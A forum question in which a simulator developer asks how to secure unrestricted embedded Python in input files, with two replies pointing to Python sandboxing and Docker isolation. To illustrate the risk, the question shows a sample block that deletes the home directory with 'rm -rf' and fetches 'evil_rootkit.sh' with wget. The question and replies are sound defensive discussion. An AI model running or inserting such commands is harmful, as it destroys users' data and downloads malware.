# Security - creating a possible vector of attack

Tags: security

we are working on a simulator. The simulator program has a slightly archaic input format which is painful to both users and developers. The simulator itself is written in C++, but we have now recently been able to retrofit embedded Python code in the input file - i.e. something like this[1,2]:

```
<python>
# Here comes normal Python code which can access and modify the current 'dom'.
...
</python>
```

Technically this works well - and it is extremely powerful. However the Python code in the `<python>...</python>` block is completely unrestricted; and hence can be a very effective vector of attack:

```
<python>
import os
os.system("rm -rf {}".format(os.getenv("HOME")))
os.system("wget evil_rootkit.sh")
...
</python>
```

As long as users run their own input files everything should be OK; but if simulations are run as a service under another user account the the potential for havoc is immense. I was thinking of a system where the administrator of the service created keys and distributed them to trusted users, and then the runtime of the simulator would check for a valid key before executing Python code. This is totally outside my normal expertise, and I would very much appreciate some pointers to things to think about, other solutions, ...

Sorry for the *extremely open ended* post - if you have a suggestion for a more suitable place to post this question I would be grateful.

[1]: I have not worked with php - but I think this should be quite similar in spirit, code embedded in a text input format - which is `eval(...)` under load.

[2]: Although I use the term 'dom' and refer to php - this is not html in any way!

Comment: Python Wiki on [Sandboxed Python](https://wiki.python.org/moin/SandboxedPython) is likely the best starting point.

Comment: If the python code runs in a different process, You can try running them in a docker container with or without network access etc.. you can also limit the CPU and memory for that container, since an attacker can try an DoS your app by simply running an infinite loop.